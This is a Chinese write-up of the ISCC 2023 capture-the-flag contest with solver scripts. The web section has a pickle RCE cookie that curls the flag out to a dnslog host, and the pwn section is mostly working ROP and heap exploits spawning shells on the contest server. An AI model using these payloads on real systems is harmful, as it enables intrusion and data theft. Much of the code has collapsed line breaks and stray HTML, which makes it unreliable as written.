ISCC线上赛2023

ISCC线上赛2023

web

web1

双重base解码得到flag

web3

F12控制台查看可找到loveStory.php Enc.php download.php，loveStory.php为反序列源码

boy::__destruct() -->girl()::__call()-->helper()::__isset()-->boy()::__toString()-->helper()::__get()-->love_story()::__love()

在get()处使用数组调用类方法执行love函数。

传入

array(new love_story(),"love")

其中，love_story中使fall_in_love=["girl_and_boy"]绕过if判断

poc:

class boy {public $like;
}class girl {private $boyname;public function __construct($boyname){$this->boyname=$boyname;}
}class helper {public $name;public $string;public function __construct($name,$string) {$this->name = $name;$this->string=array("string"=>$string);}
}
class love_story {
}$boy2=new boy;
$love1=new love_story;
$love1->fall_in_love=["girl_and_boy"];
$help2=new helper("aaa",array($love1,"love"));
$boy2->like=$help2;
$help1=new helper($boy2,"dd");
$girl1=new girl($help1);
$boy1=new boy;
$boy1->like=$girl1;
echo urlencode(serialize($boy1));

后面还有段解密

web4

.git 泄露部分源码

class ED:def __init__(self):self.file_key = ...  # 1Aa 需要爆破的keyself.cipher_suite = Fernet(self.generate_key(self.file_key))    #def crypto(self, base_str):return self.cipher_suite.encrypt(base_str)@staticmethoddef generate_key(key: str):key_byte = key.encode()return base64.urlsafe_b64encode(key_byte + b'0' * 28)def check_cookies(cookie):ed = ED()f, result = ed.decrypto(cookie)black_list = ...if not result[0:2] == b'\x80\x03':return False...try:result = pickle.loads(result)if result.name == 'mabaoguo' and result.random == mabaoguo.random and result.gongfu == mabaoguo.gongfu:return flagelse:return result.nameexcept:return False@app.route('/', methods=['GET', 'POST'])
def index():if request.method == 'POST':name = request.form['input_field']name = Member(name)name_pick = pickle.dumps(name, protocol=3)name_pick = pickletools.optimize(name_pick)ed = ED()response = make_response(redirect('/'))response.set_cookie('name', ed.crypto(name_pick).decode())return responsetemp_cookies = request.cookies.get('name')if not temp_cookies:...else:f = check_cookies(temp_cookies)...if __name__ == '__main__':app.run()

爆破密钥：

先在题目随便输入，再获得name对应的cookie

爆破脚本，这里的字典自己生成一下，数字+大小写字母组合，从短的开始

from cryptography.fernet import Fernet
import base64def generate_key(key: str):key_byte = key.encode()return base64.urlsafe_b64encode(key_byte + b'0' * 28)
se="gAAAAABkV15w1YrpamSHnPltzjwB95JFnf-3G39PwVGEHn3bjIIq47b5R2GnjsCzdoNsXiz8dw-1zstfOR8Jpwl0xmem3AnaClnFyww3_aCI4SHEukDek6B2716T_tb-RW1a9Th0MTapMmawkgoQfRSAV6uGreqgHzKxmHqdAMoyxsRrMAAEpo4="
dic=open('dic.txt','r').readlines()
times=0
for i in dic:try:key=generate_key(i.strip())fernet=Fernet(key)data=fernet.decrypt(se)times+=1print(data)print(i)breakexcept:pass
print(times)

密钥：5MbG

再生成O指令RCE的cookie

poc：

import pickle
import base64
from json import dump
from enum import member
from cryptography.fernet import Fernetclass ED:def __init__(self):self.file_key = '5MbG'self.cipher_suite = Fernet(self.generate_key(self.file_key))def crypto(self, base_str):return self.cipher_suite.encrypt(base_str)@staticmethoddef generate_key(key: str):key_byte = key.encode()return base64.urlsafe_b64encode(key_byte + b'0' * 28)print(hex(len('curl `cat flagucjbgaxqef.txt`.l8s7sjd8.dnslog.pw')))
#curl 129.211.208.123:2333/`tac fl?gucjbgaxqef.txt| base64`
payload = b'\x80\x03(cos\nsystem\nX\x30\x00\x00\x00curl `cat flagucjbgaxqef.txt`.l8s7sjd8.dnslog.pwo.'
payload1=b'\x80\x03capp\nMember\n)\x81}(X\x04\x00\x00\x00nameX\x08\x00\x00\x00mabaoguoX\x06\x00\x00\x00randomcmabaoguo\nrandom\nX\x06\x00\x00\x00gongfucmabaoguo\ngongfu\nub.'
#flagucjbgaxqef.txt
ed = ED()
cookie=ed.crypto(payload).decode()
print(cookie)

换上cookie刷新即可，在DNSlog等待回显，没有回显多尝试几次。

reverse

re1

加密函数如下，key为ISCC，解密即可

#include 
#include void decrypt(int *a1, char *a2, int a3)
{for (int m = 1; m < a3; ++m){a1[m] ^= a2[0];a1[m] -= a2[m % 4] % 5;a1[m] += a2[2] % 6 + a2[3] / 6;a1[m] -= a2[1] / 7 + *a2 % 7;}for (int i=1; i<a3; i++)< span="">{a1[i]-=i;}for (int i = 0; i < a3; ++i)a1[i] += 60;
}int main()
{int a1[] = {23, 68, 68, 15, 94, 10, 8, 10, 6, 95, 8, 24,87,3,26,105};char a2[] = "ISCC";int len =16;decrypt(a1, a2, len);printf("%c",a1[15]);for(int i=0; i<15; i++)printf("%c",a1[i]);return 0;
}</a3; i++)<>

re2

简单来说主逻辑字符串逆序加字符串压缩

取出base64密文后先逆序，再解密，然后是一个字符串压缩，就是换成重复个数

比如解出来的带有B2字样，就变成BB，以此类推

re3

思路1：用IDA改字符串序列，然后patch完了跑一遍就有

思路2：写脚本。其实是个pwn题，直接取地址硬修改字节序列修改字符串，解压出来的包号就是mod的值.这个函数get_flag就是直接计算flag的值

mod = 22 #改自己的mod包名
a1 = 0x50d7c32f4a659
a2 ="4-chloroisatin"
a3 ="Ammosamide B"
mod_out = (int((a1 % 100000) % mod)) ^ (mod * (int)(a1 % 100000))
flag ="ISCC{"+ str(mod_out)+"_" +a2+ "_" + str(a1) +"_" +a3 +"}"
print(flag)

狂飙-2

from Crypto.Cipher import AES
import zipfile
import iodef decrypt_data(key, enc_file):with open(enc_file, "rb") as f:enc = f.read()data = AES.new(key, AES.MODE_CBC, key).decrypt(enc)zip_data = data[0x1d4c36:]zip_data = io.BytesIO(zip_data)zip_file = zipfile.ZipFile(zip_data)zip_list = zip_file.namelist()elf_name = zip_list[1]zip_file.extract(elf_name, '.', pwd=key)zip_file.close()with open(elf_name, "rb") as f:elf_data = f.read()return elf_data[0xe010:0xe030]def generate_flag(data):flag = "ISCC{tHe_5eY@"for i in range(len(data)):d = data[i] - 16d ^= 2d += 44flag += chr(d)return flagif __name__ == '__main__':key = b"1422201965553241"enc_file = "cellphone.enc"data = decrypt_data(key, enc_file)flag = generate_flag(data)print(flag)

convert

data换成自己的密文 main函数中

主逻辑里一个z3

然后解出来自己的x 把代码中的x换掉

data=[ 0x28, 0x30, 0x24, 0x24, 0x62, 0x42, 0x1E, 0x14, 0x38, 0x44, 0x41, 0x43, 0x82, 0x62, 0x31, 0x5C, 0x2B, 0x4B, 0x2F, 0x3B, 0x3A, 0x4D, 0x73,]
from z3 import *
x=[BitVec("x[%d]"%i ,8) for i in range(23)]
key =[ord(i) for i in "ISCC"]
for i in range(23):x[i]-=32x[i]+=ifor j in range(4):x[j] += j ^ -(key[j] % 4);x[j + 4] += key[j] % 5;x[j + 8] += 2 * j;x[j + 12] += x[j + 4];x[j + 16] += key[j] / 5;
S= Solver()
for i in range(23):S.add(x[i] == data[i])
S.check()
print(S.model())
x[16] = 45
x[0] = 73
x[19] = 59
x[15] = 89
x[10] = 83
x[13] = 51
x[3] = 67
x[6] = 54
x[11] = 82
x[4] = 123
x[5] = 90
x[1] = 83
x[12] = 52
x[20] = 70
x[18] = 48
x[21] = 88
x[7] = 43
x[2] = 67
x[22] = 125
x[8] = 80
x[17] = 74
x[14] = 37
x[9] = 89
for i in x:print(chr(i),end='')

奇门遁甲

按照奇门顺序输入31284567，记录每个门的字符串拼起来即可

re4(动态)Pull the Wool Over People's Eyes

二进制换成自己的

key = list(b'ISCC{ACYeeeloorrsuv}')
flag = "0000000000000000000000000000000000000000000001010011101101101101001111110001010000100111010111110010110001011010001010100011110100101010000110100010000000000000"
for i in range(len(flag)//8):print(chr(int(flag[i*8:i*8+8],2)^key[i]),end="")

re1（动态） Congratulations

密文只需要换二十五个，别把最后那个盖住了。由于附件问题，跑出来结果有 ‘[’ 字符串的断定为乱码，把一个 ‘[’ 换成A即可。如果有多个 '[' 的话只需要换一个即可。如下：

即flag为：ISCC{eUN2kptIQz-TArk(%4L!}

如flag为：ISCC(73ZCJrszU[gCR[GVru!}，换一个 '[' 就行，即flag为：ISCC(73ZCJrszUAgCR[GVru!} 或者 ISCC(73ZCJrszU[gCRAGVru!}

exp如下：

#include 
int main(void)
{char v9[26]; // [esp+140h] [ebp-28h]v9[0] = 165;v9[1] = 67;v9[2] = 83;v9[3] = 148;v9[4] = 68;v9[5] = 67;v9[6] = 84;v9[7] = 72;v9[8] = 155;v9[9] = 168;v9[10] = 175;v9[11] = 120;v9[12] = 171;v9[13] = 132;v9[14] = 31;v9[15] = 137;v9[16] = 170;v9[17] = 186;v9[18] = 84;v9[19] = 17;v9[20] = 80;v9[21] = 162;v9[22] = 186;v9[23] = 121;v9[24] = 247;v9[25] = '_';for (int i = 0; i < 25; i++){v9[i] ^= 'S';}for (int i = 24; i >= 0; i--){v9[i] += v9[i + 1];}for (int i = 0; i < 26; i++){v9[i] += 30;}char v5[] = "abcdefghijklmnopqrstuvwxyz";char v4[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";for (int i = 0; i < 26; i++){if (v9[i] == '{' || v9[i] == '}'){continue;}if (v9[i] >= 'A' && v9[i] <= 'Z'){v9[i] += 1;}else if (v9[i] >= 'a' && v9[i] <= 'z'){v9[i] += 1;}}for (int i = 0; i < 26; i++){printf("%c", v9[i]);

Pwn

pwn1

from pwn import *
from ctypes import *
context.log_level='debug'
#io = process('../makewishes')
io = remote('59.110.164.72','10001')
libc_cdll = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
libc_cdll.srand(0x41414141)a = str(libc_cdll.rand() % 9 +1)io.recv()
io.sendline('A'*0x16)
io.recv()
io.sendline(a)
io.recv()
io.sendline('%11$p')
io.recvuntil('0x')
canary = int(io.recv(16),16)
print(canary)
io.sendline(a)
io.recv()
payload = b'A'*0x28
payload += p64(canary)
payload += b'C'*0x8
payload += p64(0x00000000004011D6)
io.sendline(payload)io.interactive()

pwn2

from pwn import *
context.log_level='debug'
io = remote('59.110.164.72','10000')
#io = process('../Login')
libc = ELF('../libc-2.23.so')
#0x3c48e0
io.recvuntil('Here is a tip: 0x')
libcbase = int(io.recv(12),16) - libc.symbols['_IO_2_1_stdin_']
print(hex(libcbase))
io.send(b'A'*0x1c+p32(0x15CC15CC))
io.recv()system = libcbase + libc.symbols['system']
binsh = libcbase + libc.search(b'/bin/sh').__next__()payload = b'A'*0x20
payload += p64(0x0000000000400599)
payload += p64(0x00000000004008c3)
payload += p64(binsh)
payload += p64(system)
io.sendline(payload)io.interactive()

pwn3

from pwn import*context.os="linux"
context.log_level="debug"
elf=ELF('./pwn')
libc =ELF('./libc.so.6')io=1
if io==0:p=process('./pwn')
else:p=remote('59.110.164.72',10002)def dbg():gdb.attach(p)pause()code=b'dunbi000'
code+=b'cuobi000'
code+=b'yufeng00'
code+=b'dunfeng0'
code+=b'cunfeng0'
code+=b'nvfeng00'
code+=b'yuefeng0'
code+=b'anfeng00'
code+=b'jiebi000'p.sendlineafter(b"and 40 to 47 is 'nvfeng00'!\n",code)fun_101101=0x000400B0F
fun_101001=0x00400B30
rdi=0x0000000000400c53
ret=0x00000000004006c1p.recvuntil(b'or you can look for other space\n')# pay=b'a'*(0x20+8)+p64(fun_101001)
# p.sendline(pay)
# p.recvuntil(b"It's easy to eat it\n")
# p.sendline(b' 1152921504606846977')pay=b'a'*(0x20+8)+p64(fun_101101)
p.send(pay)pay=b'a'*(0x20+8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(fun_101101)
p.sendline(pay)puts_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) 
libc_base = puts_addr  - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
bin_sh_addr = libc_base + libc.search(b"/bin/sh").__next__()pay=b'a'*(0x20+8)+p64(rdi)+p64(bin_sh_addr)+p64(system_addr)
p.sendline(pay)p.interactive()

pwn4

from pwn import *
from itertools import *#p =process('./your_character')
p = remote('59.110.164.72', 10003)
context(arch='amd64',log_level = 'debug')libc = ELF('./libc.so.6')
elf = ELF('./your_character')menu = b"Your choice :"
def add(size):p.sendlineafter(menu, b'1')p.sendlineafter(b"Damage of skill : ", str(size).encode())p.sendafter(b"introduction of skill:", b'A')def edit_size(idx, size):p.sendlineafter(menu, b'2')p.sendlineafter(b"Index :", str(idx).encode())p.sendlineafter(b"Damage of skill : ", str(size).encode())def edit(idx,msg):p.sendlineafter(menu, b'3')p.sendlineafter(b"Index :", str(idx).encode())p.sendafter(b"introduction of skill : ", msg)def show(idx):p.sendlineafter(menu, b'4')p.sendlineafter(b"Index :", str(idx).encode())def free(idx):p.sendlineafter(menu, b'5')p.sendlineafter(b"Index :", str(idx).encode())p.sendlineafter(b"Your choice :", b'2')
p.sendlineafter(b"Please enter the background story of your character: \n", b'A')p.sendlineafter(b"Your choice :", b'1') #infor i in [0x80,0x18,0x18,0x18]:add(i)edit(1, b'A'*0x18+ p8(0x61))
free(2)add(0x58)
edit(2, b'A'*0x8)
show(2)
p.recvuntil(b'A'*0x8)
heap_addr = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x370
print(f"{heap_addr = :x}")free(0)
edit(2, flat(0,0,0,0x21,0x800,heap_addr+ 0x280)) #2 ptr-> unsortshow(2)
p.recvuntil(b"Introduction : ")
libc.address = u64(p.recvline()[:-1].ljust(8, b'\x00'))  - 0x58 - 0x10 - libc.sym['__malloc_hook']
print(f"{libc.address = :x}")edit(2, b'A'*0xf0 + flat(0x800, heap_addr+0x10) )
one = [0x45226, 0x4527a, 0xf0364, 0xf1207 ]
edit(2, p64(libc.address + one[0])*2)p.sendlineafter(menu, b'6')
p.sendlineafter(menu, b'4')#gdb.attach(p)
#pause()p.sendline(b'cat /flag*')p.interactive()

擂台1

from pwn import*context.os="linux"
context.log_level="debug"
elf=ELF('./pwn')io=1
if io==0:p=process('./pwn')
else:p=remote('59.110.164.72',10005)def dbg():gdb.attach(p)pause()p.sendlineafter(b'input your choice : ',b'1')
p.sendlineafter(b'input idx plz : ',b'1')
p.sendlineafter(b'input size plz : ',str(0x90))p.sendlineafter(b'input your choice : ',b'1')
p.sendlineafter(b'input idx plz : ',b'2')
p.sendlineafter(b'input size plz : ',str(0x90))p.sendlineafter(b'input your choice : ',b'2')
p.sendlineafter(b'input idx plz : ',b'1')p.sendlineafter(b'input your choice : ',b'4')
p.sendlineafter(b'input idx plz : ',b'1')
p.sendlineafter(b'input content plz : ',p64(0)+p64(0x6029b8-0x10))p.sendlineafter(b'input your choice : ',b'1')
p.sendlineafter(b'input idx plz : ',b'3')
p.sendlineafter(b'input size plz : ',str(0x90))p.sendlineafter(b'input your choice : ',b'5')p.recvuntil(b'input your key\n')
pay=b'a'*(0x10+8)+p64(0x00004009AA)
p.sendline(pay)p.interactive()

擂台2

from pwn import*context.os="linux"
context.log_level="debug"
elf=ELF('./pwn')
libc =ELF('./libc-2.27.so')io=1
if io==0:p=process('./pwn')
else:p=remote('59.110.164.72',10006)def dbg():gdb.attach(p)pause()def add(id,size):p.sendlineafter(b'choice:',b'1')p.sendlineafter(b'Index:',str(id))p.sendlineafter(b'len:',str(size))def dele(id):p.sendlineafter(b'choice:',b'2')p.sendlineafter(b'Index:',str(id))def edit(id,pay):p.sendlineafter(b'choice:',b'3')p.sendlineafter(b'Index:',str(id))p.sendline(pay)def show(id):p.sendlineafter(b'choice:',b'4')p.sendlineafter(b'Index:',str(id))p.sendlineafter(b'Input your favorite sentence:\n',b'aaaa')
p.sendlineafter(b'Input your cookie:\n',b'365303148')p.recvuntil(b'Your first gift: 0x')
sentence=int(p.recvline(),16)^0x15C6156Cp.recvuntil(b'Your second gift: 0x')
sentence_addr=int(p.recvline(),16)^sentence^0x15C6156Cadd(-12,0x88)
add(-11,0x88)
add(-10,0x88)
add(-9,0x88)
add(-7,0x88)
add(0,0x88)
add(1,0x88)add(2,0x88)
add(3,0x88)dele(-12)
dele(-11)
dele(-10)
dele(-9)
dele(-7)
dele(0)
dele(1)dele(2)
show(2)
libc_base=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x60-0x3EBC40free_hook=libc_base+libc.sym['__free_hook']Nodes=sentence_addr-0x30
fd=Nodes-8
bk=Nodes
pay=p64(0)+p64(0x80)+p64(fd)+p64(bk)+p64(0)*12+p64(0x80)
edit(2,pay)
dele(3)pay=p64(0)+p64(free_hook)
edit(2,pay)system=libc_base+libc.sym['system']
edit(0,p64(system))add(4,0x80)
edit(4,b'/bin/sh\x00')
dele(4)success('sentence-->'+str(hex(sentence)))
success('sentence_addr-->'+str(hex(sentence_addr)))
success('libc_base-->'+str(hex(libc_base)))# dbg()p.interactive()

pwn1 Double

from pwn import*
from LibcSearcher import *#context.arch="amd64"
#context.arch="i386"
context.os="linux"
context.log_level="debug"
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')io=1
if io==0:p=process('./pwn')
else:p=remote('59.110.164.72',10021)def dbg():gdb.attach(p)pause()def add(id,size):p.sendlineafter('请选择：',b'1')p.sendlineafter('请输入序号：',str(id))p.sendlineafter('请输入大小：',str(size))def dele(id):p.sendlineafter('请选择：',b'2')p.sendlineafter('请输入序号：',str(id))def show(id):p.sendlineafter('请选择：',b'3')p.sendlineafter('请输入序号：',str(id))def edit(id,pay):p.sendlineafter('请选择：',b'4')p.sendlineafter('请输入序号：',str(id))p.sendafter('请输入编辑内容：',pay)
add(2,0x41)
add(16,0x40)
add(18,0x30)add(4,0x30)
add(5,0x30)
add(6,0x30)dele(4)
dele(5)
dele(4)add(7,0x30)
edit(7,p64(0x6020e0))add(8,0x30)
add(9,0x30)
add(10,0x30)#sizesadd(4,0x40)
add(5,0x90)edit(10,p32(0x50))ptrs=0x6024e0
fd=ptrs+8
bk=ptrs+16
pay=p64(0)+p64(0x41)+p64(fd)+p64(bk)+p64(0)*4+p64(0x40)+p64(0xa0)
edit(4,pay)dele(5)edit(4,p64(0)+p64(elf.got['atoi']))edit(2,p64(0x4008FE))p.sendlineafter('请选择：',b'/bin/sh\x00')p.interactive()

pwn2 chef

from pwn import*
from LibcSearcher import *#context.arch="amd64"
#context.arch="i386"
context.os="linux"
context.log_level="debug"
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')io=1
if io==0:p=process('./pwn')
else:p=remote('59.110.164.72',10031)def dbg():gdb.attach(p)pause()p.sendlineafter(b'Your choice:',b'4')def show():p.sendlineafter(b'Your choice:',b'1')def add(size,pay):p.sendlineafter(b'Your choice:',b'2')p.sendlineafter(b'Please enter the price of food:',str(size))p.sendlineafter(b'Please enter the name of food:',pay)def edit(id,size,pay):p.sendlineafter(b'Your choice:',b'3')p.sendlineafter(b'Please enter the index of food:',str(id))p.sendlineafter(b'Please enter the price of food :',str(size))p.sendlineafter(b'Please enter the name of food:',pay)def dele(id):p.sendlineafter(b'Your choice:',b'4')p.sendlineafter(b'Please enter the index of food:',str(id))foodlist=0x6020a0
fd=foodlist-0x10
bk=foodlist-8add(0x40,b'aaa')
add(0x90,b'bbbbb')
add(0x10,b'cccc')pay=p64(0)+p64(0x41)+p64(fd)+p64(bk)+p64(0)*4+p64(0x40)+p64(0xa0)
edit(0,0x60,pay)
dele(1)pay=p64(0)*2+p64(0x40)+p64(0x602090)+p64(0)*2+p64(0x10)+p64(elf.got['atoi'])
edit(0,0x100,pay)show()
atoi=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))libc_base=atoi-libc.sym['atoi']
system=libc_base+libc.sym['system']edit(2,0x10,p64(system))p.sendlineafter(b'Your choice:',b'/bin/sh\x00')# dbg()p.interactive()

Misc

misc1

修改图片高度是667

图片镜像翻转左右

在线站点https://www.gaitubao.com/xuanzhuan/

图片识别在线站点

https://products.aspose.app/barcode/zh-hans/recognize/datamatrix#/recognized

reverse+html解码

misc2

镜像内文件损坏，volatility下不来flag，拿取证大师可以恢复损坏的文件，可以看到flag.txt了

一打开发现DES加密，去寻找密钥

volatility内的mimikatz可以抓到一个pwd，然后找到解密密码ISCC2023

misc3（动态）

流量包IMF协议提取picture.eml

邮件里有picture.rar

base64转码16进制保存

18和22tcp协议包中有两段pass拼接，是rar的密码

黑白图片二进制识别

脚本:

from PIL import Image 
result = "" 
for i in range(1,113,1):     
img = Image.open(f"C:\\Users\\tzzzez\\Desktop\\picture\\{i}.png")     
im_RGB = img.convert("RGB") # 将图片转换为RGB模式     
r,g,b =im_RGB.getpixel((1,1)) #获得x,y坐标的rgb值     
print(r,g,b)# 这题中白色图片rgb值:255,255,255 黑色图片rgb值：12,12,0     
if r !=255: #255是白色         
result +="1"     
else:         
result +="0" #将二进制转换为ascii码 
for i in range(0,len(result),8):     
byte = result[i:i+8]     
print(chr(int(byte,2)),end="")

misc4（动态）

跑出数据集里的图片，先在dataset里建一个png文件夹

import numpy as np
from PIL import Image# 图像宽度和高度
width, height = 28, 0# 依次读取每个文件，将其转换为图像并保存
for i in range(32):# 读取浮点数数据with open(f'{i}.txt', 'r') as f:data = f.read()data = np.fromstring(data, sep='\n')# 计算图像高度height = len(data) // width# 将浮点数转换为 8 位无符号整数data = np.clip(data, 0, 255)data = data.astype(np.uint8)# 创建图像并保存img = Image.fromarray(data.reshape((height, width)))img.save(f'png/{i}.png')

跑出图片里的数据

ciphertext = ['51', '59', '75', '95', '56', '46', '664', '636', '52', '57', '685', '77', '56', '50', '688', '669', '56', '682', '688', '687', '25', '73', '680', '684', '22', '685', '28', '633', '683', '56', '96', '96']
#自己的图片结果覆盖掉第一行的list
import itertools
import contextlib
with open("out.txt", "wb") as output_file:for permutation in itertools.permutations("0123456789", 10):translation_table = str.maketrans("0123456789", ''.join(permutation))translated_text = [string.translate(translation_table) for string in ciphertext]with contextlib.suppress(Exception):plaintext = bytes([int(character) for character in translated_text])output_file.write(plaintext + b"\n")

结果集里搜索SVNDQ3，是iscc的base64，找到没有乱码的一串完整base64即可解密，没有就是数据问题

misc1

解压密码是人生之路.jpeg

解压出来的数据填入"data填这里"

import string
c="data填这里".strip()
a=c.split(" ")
a=list(a[0])
p=0
for i in a:if i in string.ascii_lowercase:i=chr((ord(i)-97+p)%26+97)while i not in "wasd":i=chr((ord(i)-97+1)%26+97)p+=1elif i in string.ascii_uppercase:i=chr((ord(i)-65+p)%26+65)while i not in "ZI":i=chr((ord(i)-65+1)%26+65)p+=1
a=list(c)
for i in range(len(a)):if a[i]==" ":passelse:if a[i] in string.ascii_lowercase:a[i]=chr((ord(a[i])-97+p)%26+97)elif a[i] in string.ascii_uppercase:a[i]=chr((ord(a[i])-65+p)%26+65)
a="".join(a)
a=a.split(" ")
map={"saIsIwIdIwaIsdIsI": "A","sZwZdZsZaZdZsZaZ": "B","aZsZdZ": "C","sZwZdZsZaZ": "D","dZaZsIdZaZsIdZ": "E","dZaZsZaIdZ": "F","aZsZdZwIaI": "G","sZwIdZwIsZ": "H","dZaIsZaIdZ": "I","dZaIsZaI": "J","sZwIdIdwIsaIsdI": "K","sZdZ": "L","wZsdIwdIsZ": "M","wZsdZwZ": "N","sZdZwZaZ": "O","sZwZdZsIaZ": "P","aZwZdZsZsdI": "Q","sZwZdZsIaZdZsI": "R","aZsIdZsIaZ": "S","dZaIsZ": "T","sZdZwZ": "U","sIsdIdwIwI": "V","sdZwdZsdZwdZ": "W","sdZwaIwdIsaZ": "X","sdIwdIsaIsI": "Y","dZsaZdZ": "Z","aIsIaIdIsIdI": "{","dIsIdIaIsIaI": "}"
}
for i in a:print(map[i],end='')
print()

misc2（动态）汤姆历险记

同第一周的misc3。原型答案为：i2s0c2c3，根据字典换就可以了，给出了一个快速替换的脚本如下：

dictionary = open('./dictionary.txt','r').read().split('\n')[:-1]
dict1 = {}
for pair in dictionary:key, value = pair.split(':')dict1[key] = value
print(dict1)
message="ISCC{i2s0c2c3}"[print(dict1.get(i),end='')if i in dict1 else print(i,end='') for i in message ]